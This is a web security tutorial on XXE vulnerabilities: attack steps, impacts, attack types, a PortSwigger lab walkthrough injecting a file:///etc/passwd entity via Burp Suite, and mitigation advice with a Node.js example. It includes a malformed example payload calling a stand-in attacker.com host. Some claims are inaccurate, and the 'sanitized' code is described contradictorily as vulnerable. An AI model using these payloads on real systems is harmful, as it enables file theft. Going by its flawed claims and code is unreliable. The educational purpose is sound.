XML External Entity

XML External Entity (XXE) vulnerabilities occur when an application parses untrusted XML input that contains external entity references, and the XML parser resolves those entities without proper validation. Attackers can abuse this behavior to read local files, perform SSRF requests, cause DoS, or (in rare cases) achieve code execution.

How XXE Attacks Work

The following steps outline how an XXE attack is carried out, from injecting malicious XML to exploiting the vulnerable parser.

1. Untrusted XML Input: An attacker submits malicious XML data to the application. This data might contain a seemingly harmless reference to an external entity.

Example: An attacker submits a login request with the following XML payload:

<user>
  <username>attacker</username>
  <password>weakpassword</password>
  <avatar>&#37;include external "https://attacker.com/steal_credentials.txt"</avatar>
</user>

In this example, the `avatar` element contains an external entity reference (`%include`) that points to a malicious URL controlled by the attacker (`https://attacker.com/steal_credentials.txt%60).

2. Improper Validation: The application processes the XML data without adequately validating the external entity reference.

3. Exploiting the Reference: The application attempts to access the external resource specified in the entity reference. An attacker can manipulate this behavior for malicious purposes.

Example : The vulnerable application retrieves the content from the attacker's URL. 
This content could be a script that steals the user's login credentials submitted in the same XML request.

Potential Impacts of XXE Attacks

Information Disclosure: Attackers can use XXE to retrieve files from the server, potentially exposing sensitive data like user credentials, financial information, or internal documents.

Example: An attacker might use XXE to access the file `/etc/passwd` on the server, 
which contains usernames and hashed passwords for all system users.

Server-Side Request Forgery (SSRF): XXE attacks can be used to trick the server into making unauthorized requests to other internal systems or even external websites.

Example: An attacker might use XXE to force the server to send a request to an internal system 
that exposes user data or launch a denial-of-service attack against another website.

Denial-of-Service (DoS): By crafting malicious XXE entities that consume excessive resources, attackers can overload the server and make it unavailable to legitimate users.

Example: An attacker might submit an XXE payload that forces the server to download 
a large file repeatedly, exhausting system resources and causing a DoS attack.

Code Execution (Rare): In some cases, XXE vulnerabilities can be exploited to execute arbitrary code on the server, allowing attackers complete control over the system.

Example (Hypothetical): An attacker might exploit a specific vulnerability in the XML parser 
to inject code that gives them remote access to the server.

Types of XXE Attacks

here is a short, clear summary of the main XXE attack types:

In-band (File disclosure): The parser returns the contents of a local or remote file directly in the application response, exposing sensitive data.
Out-of-band (OOB) XXE: The application is induced to make network requests to an attacker-controlled server, which receives exfiltrated data asynchronously.
Blind XXE: No direct data is returned, but the attacker infers information from side effects (timings, error differences, or external callbacks).
SSRF via XXE: XXE causes the server to request internal network resources (internal APIs, metadata services), enabling discovery or further compromise.
DoS (Entity expansion): Malicious XML entities trigger excessive resource consumption (e.g., “billion laughs”), crashing or slowing the parser.
Chained attacks: Attackers combine the above techniques (e.g., read configuration, then perform SSRF) to escalate impact.

Hand-On lab

Prerequisites

Burp Suite: Ensure you have Burp Suite (Community or Professional) set up to intercept HTTP requests.
Lab Access: You need access to the PortSwigger lab environment at the provided URL.
Browser: Use a browser with Burp Suite proxy configured to intercept requests.

Steps to Solve the Lab

We used the PortSwigger lab for this exercise here is the link Exploiting XXE using external entities to retrieve files

Step 1: Access the Product Page and Identify Check Stock Feature

Navigate to the lab: Exploiting XXE using external entities to retrieve files

Browse to any product page in the lab’s web application (e.g., click on a product like "Widget" or "Gadget").

Locate the "Check stock" button on the product page and click it to trigger a stock check request.

This action sends a POST request to the server with XML data containing the product ID and store ID.

Step 2: Set Up Burp Suite to Intercept the Request

Open Burp Suite and ensure the proxy is configured to intercept requests (Proxy > Intercept > Intercept is on).
In your browser click the "Check stock" button again.
Burp Suite will intercept the POST request. It should look something like this:

Step 3: Modify the XML to Include an External Entity

In Burp Suite, forward the intercepted request to the Repeater tool for easier manipulation (right-click the request and select "Send to Repeater").
In the Repeater tab, modify the XML body to inject an XXE payload.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY hm SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
    <productId>&hm;</productId>
    <storeId>1</storeId>
</stockCheck>

Explanation:

<!DOCTYPE test [ <!ENTITY hm SYSTEM "file:///etc/passwd"> ]> defines an external entity named hm that references the /etc/passwd file on the server.
&hm; in the <productId> field injects the contents of /etc/passwd into the request.

Step 4: Send the Modified Request

In Burp Suite Repeater, click Send to submit the modified POST request to the server.
Observe the server’s response in the Repeater’s response pane.

Step 5: Verify the Response

The server should process the XML, resolve the xxe entity, and include the contents of /etc/passwd in the response. The response will likely look like:

The presence of /etc/passwd contents (e.g., user account details like root:x:0:0:root:/root:/bin/bash) indicates a successful XXE exploit.
The lab should mark itself as solved if the server correctly returns the file contents.

Mitigating XXE Vulnerabilities

By understanding and implementing these mitigation strategies, developers can significantly improve the security posture of their web applications and prevent XXE vulnerabilities:

Disable External Entity Processing: This is the most secure approach but may limit functionality. Configure the XML parser to disallow external entity resolution entirely.
Whitelist Allowed Entities: Specify a list of authorized external entities that the parser can access. This restricts potential attack vectors but requires maintaining the whitelist.
Input Validation and Sanitization: Rigorously validate and sanitize user input before processing XML documents. This involves checking for malicious XML constructs like external entity references and removing them.
Update XML Libraries: Regularly update XML processing libraries used in your application. Updates often include patches for identified XXE vulnerabilities.
Secure Development Practices: Implement secure coding practices throughout the development lifecycle. This includes using secure coding libraries and frameworks, and following best practices for handling user input.

Steps :

Before running the code, you need to install the required dependencies.

Run the following command:

npm install xml2js xml-sanitizer

Create a new JavaScript file (e.g., processReview.js) and paste the code I provided.

Run the following command:

node processReview.js

Example: Here is an vulnerable code example with a sanitized (safe) external entity reference.

JavaScript

// processReview.js
const xml2js = require("xml2js");
const xmlSanitizer = require("xml-sanitizer");
 // Import sanitization library

/**
 * Processes a product review written in XML format.
 *
 * This function takes a string containing valid XML as input
 * and extracts the author name, content of the review, and rating.
 * It then prints this information to the console.
 *
 * @param {string} reviewXml - The XML string representing the product review.
 */
function processReview(reviewXml) {
  // Sanitize user input with a regular expression
  const sanitizedXml = xmlSanitizer(reviewXml);

  const parser = new xml2js.Parser();

  parser.parseString(sanitizedXml, (err, result) => {
    if (err) {
      console.error("Error processing review:", err);
      return;
    }
   console.log(result);
    const review = result.review;

    const author = review.author[0];
    const content = review.content[0];
    const rating = review.rating[0];

    console.log(`Review by: ${author}`);
    console.log(`Content: ${content}`);
    console.log(`Rating: ${rating}`);
  });
}

// Example of valid review with sanitized entity reference (no attack)
const validReview = `
<review>
  <author>John Doe</author>
  <content>This product is amazing!</content>
  <rating>5</rating>
</review>
`;

processReview(validReview);

Output

Review by: John Doe
Content: This product is amazing!
Rating: 5

Explanation:

We import the xml2js library using require('xml2js').
We import the xmlSanitizer library using require('xml-sanitizer').
The processReview function now takes the review XML as a string argument.
Now , we sanitized the XML using xmlSanitizer fucnction.
We create a new xml2js.Parser object.
We use parser.parseString to parse the XML string. It takes a callback function that handles the parsed data.
Inside the callback, we check for any errors during parsing.
If there's no error, we access the parsed data using nested object destructuring.
We extract the author, content, and rating from the parsed data structure.
Finally, we print the review details.

Remember: This is a vulnerable example for demonstration purposes only. In a real application, you should implement proper validation and whitelisting of allowed entities to prevent XXE attacks.

By understanding the potential dangers of XXE vulnerabilities and implementing the recommended mitigation strategies, developers can create more secure web applications.